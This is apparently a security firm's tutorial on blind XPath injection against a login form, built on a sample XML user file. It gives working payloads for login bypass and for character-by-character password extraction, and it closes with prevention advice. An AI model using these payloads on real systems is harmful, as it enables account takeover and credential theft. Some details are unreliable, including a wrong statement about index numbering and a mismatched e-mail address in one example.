Transport Layer Security
Use the extended attack possibilities of XPath injection
To explain the most important terms, we have provided a simple XML document below; this document forms the basis for the rest of the article.
<?xml version="1.0" encoding="UTF-8"?> <accounts> <!-- root node --> <user id="1"> <!-- node with attribute --> <username> <!-- child of user node --> 1337h4x0r <!-- node value --> </username> <firstname>Leet</firstname> <lastname>Hacker</lastname> <email>email@example.com</email> <accounttype>normal</accounttype> <password>123456</password> </user> <user id="2"> <username>johnnynormal</username> <firstname>John</firstname> <lastname>Doe</lastname> <email>firstname.lastname@example.org</email> <accounttype>administrator</accounttype> <password>UiobxmA5UcDVF9m5VAq</password> </user> </accounts>
The XML document shown above corresponds approximately to the following tree:
With XPath, the nodes in an XML document can be selected in various ways. The most important selection options here are:
|XPath query||Result of the XPath query|
|/accounts||The root node accounts are selected.|
|//user||All nodes with the name ‘user’ are selected.|
|/accounts/user||All user nodes that are child nodes of the accounts node are selected.|
|/accounts/user[username=‘1337h4×0r’]||The user node that includes the user name 1337h4×0r is returned. An absolute path starts with /.|
|//user[email=‘email@example.com’]||The user node that includes the e-mail address firstname.lastname@example.org is returned. A relative path starts with //. This selects all nodes that meet the condition(s) set, no matter where in the tree the nodes are located.|
|/accounts/child::node()||This selects all child nodes of the accounts node.|
|//user[position()=2]||This selects the user node at this position. Warning: Since the index starts at 1, this selects the node of the user johnnynormal.|
Now we have covered the most important basics of XML Path Language, I will provide step by step instructions for how to approach a Blind XPath Injection. Here we base our example on a login screen. The goal is to bypass this login screen to ultimately allow us to read out all users’ passwords.
To determine the existence of an XPath Injection in principle, an apostrophe
' or a quotation mark
" can be entered as the first character in the user name field. In the best-case scenario, an error message will be returned for one of these characters; this message would look something like this:
Warning: SimpleXMLElement::xpath(): Invalid predicate in /webserver/index.php on line 56 Warning: SimpleXMLElement::xpath(): xmlXPathEval: evaluation failed in /webserver/index.php on line 56
The appearance of this message or something similar unequivocally confirms that an XPath Injection in this section is the right approach.
In general, an XPath Injection uses a similar principle to an SQL injection. The point is to change an existing XPath query in such a way that it has the effect desired by the attacker.
Fortunately for the attacker, an XPath Injection – unlike an SQL injection – works in such a way that no access controls can be implemented within the XML document. Consequently, the entire XML document can be read out in the event of an XPath injection.
Furthermore, XPath is a standard query language; this means that different XPath dialects do not need to be dealt with. Only the fact that there are different XPath versions must be taken into account. At the moment, XPath 3.1 is the most current version. To determine the XPath version used, a function from version 2.0 or 3.1 that did not yet exist in the previous XPath version can be employed. If an error message stating this function does not exist is displayed, you can assume that you are dealing with an older XPath version.
In our example, I use the function
lower-case("ABC"), which was not launched until version 2.0, to check the XPath version. Since the error message below is output in our example, it can be concluded that XPath 1.0 is being used.
"Warning : SimpleXMLElement::xpath() : xmlXPathCompOpEval : function lower-case not found in /webserver/index.php on line 56 Warning : SimpleXMLElement::xpath() : Unregistered function in /webserver/index.php on line 56 Warning : SimpleXMLElement::xpath() : Stack usage error in /webserver/index.php on line 56 Warning : SimpleXMLElement::xpath() : xmlXPathEval : 1 object left on the stack in /webserver/index.php on line 56"
Similar to the expression
' OR '1'='1 in an SQL Injection,
' or 1=1 or ''=' exists in an XPath Injection. As a result, evaluation of the condition
password='...' can be bypassed during a query formed as
'bool_value_1 and bool_value_2', such as
username='...' and password='...'.
Our example includes the input fields User name and Password. We enter the value
' or 1=1 or ''=' as the user name and the value
bla as the password. If we assume the server logic below:
simplexml_load_file("useraccounts.xml")->xpath("/accounts/user[username=' " . $_POST["username"] . " ' and password=' " . $_POST["password"] . " ' ]");
the following XPath query is created:
xpath("/accounts/user[username='' or 1=1 or ''='' and password='bla' ]")
Due to the two successive or-statements, evaluation of the and-statement is bypassed. The result of the entry is that we are logged in as the first user of the XML document. We are logged in as the first user because the changed XPath query returns all users and the first user from this result is then used in each case.
Now we have arrived at a state that permits us to perform a Boolean-Based Blind Injection. We can change the first or-statement and, if we are still logged in as the first user after this change, the or-statement is correct.
To continue this example in a logical manner, we assume that we can determine the password of the XML document’s first user. To do this, we can either change the password once we are logged in, or we could read it out from the user interface of the profile for the user who is logged in. Thus, for the rest of this example we assume that we know the password to be 123456.
Since we assume that the XML document has an unknown structure , the first task is to determine the node where the password is saved. Knowing this position within a user element is fundamental because we can only brute-force an unknown password if we are aware of the position. Here it is helpful to know the password of the user who is in first place.
I would now like to go through each step in the first or-query, which we need for the Blind XPath Injection:
//user[position()=1]: This reads out the user who is in first place in the XML document. We should note here that the node name ‘user’ is a justified assumption. If we do not get any hits using this assumption, other terms similar to ‘user’ should be used.
(//user[position()=1]/child::node()[position()=1]): The aim of this query is to read out the first child node of the first user. Applied to our sample XML document, this would be the
substring((//user[position()=1]/child::node()[position()=1]),1): Substring is defined as
string substring(string_to_work_with, start_of_substring_extraction, [optional_length_of_extracted_string]). Applied to our sample XML, this means that the string is read out from the
usernamenode. Since no length is specified, the entire string
1337h4x0ris read out. Warning: In XPath, the index starts at
0, as is otherwise customary in IT.
substring((//user[position()=1]/child::node()[position()=1]),1)="123456": After the effective value of the first user’s first child node has been read out and determined to be
1337h4x0r, this value is compared to
123456. In this case, the comparison causes a
falsevalue. If this query is inserted as it is as our first or-value in the query
' or 1=1 or ''=', evaluation of this query does not lead to a successful login. We can then conclude that the first position of the user is not the password. To achieve a login in our sample XML, the query
' or substring((//user[position()=1]/child::node()[position()=6]),1)="123456" or ''='is needed. This allows us to determine that the password is in position 6 in the user node.
Since we now know the position of the password, we can easily adjust the query to:
' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="a" or ''='. This queries the first character of the password for the second user and compares that character with the letter
'a'. We manage this by specifying in the substring query how many characters from the start position are to be returned. Since we do not get a successful login with a comparison to
'a', we can conclude that the password of the second user does not start with a. It is not until we use
' or substring((//user[position()=2]/child::node()[position()=6]),1,1)="U" or ''=' that we are successfully logged in as the first user of the XML document again. So, the first character of the password is the letter
The only thing left to do is to increment the position of the selected substring and compare the characters again.
' or substring((//user[position()=2]/child::node()[position()=6]),2,1)="i" or ''=' gets us our second hit.
This type of comparison can be automated relatively easily, so readers are free to research this themselves if they so wish.
To prevent an XPath Injection, pre-compiled XPath queries should be used if at all possible. If the selected library does not support these, a parameterized XPath interface should be used. If neither of these options is possible and a user’s input has to be embedded in a dynamic XPath query, the user input must be escaped. When escaping values, Whitelisting approaches should be used wherever possible.
In conclusion, I would like to note that this article focused solely on evaluating XPath 1.0. Compared to versions 2.0 and 3.1, XPath 1.0 has only a few functions, so reading out XML documents therefore requires a large number of queries. The expansions in XPath 2.0 and 3.1 have seen the addition of many functions that simplify reading out XML document, thus broadening the reach of an XPath Injection. For example, the function
doc(path_to_xml_document) was added in XPath 2.0 and allows users to reference – and, as a result, read out – other XML documents. This allows users to read out config files with known memory locations, for instance.
Our experts will get in contact with you!
Our experts will get in contact with you!
Further articles available here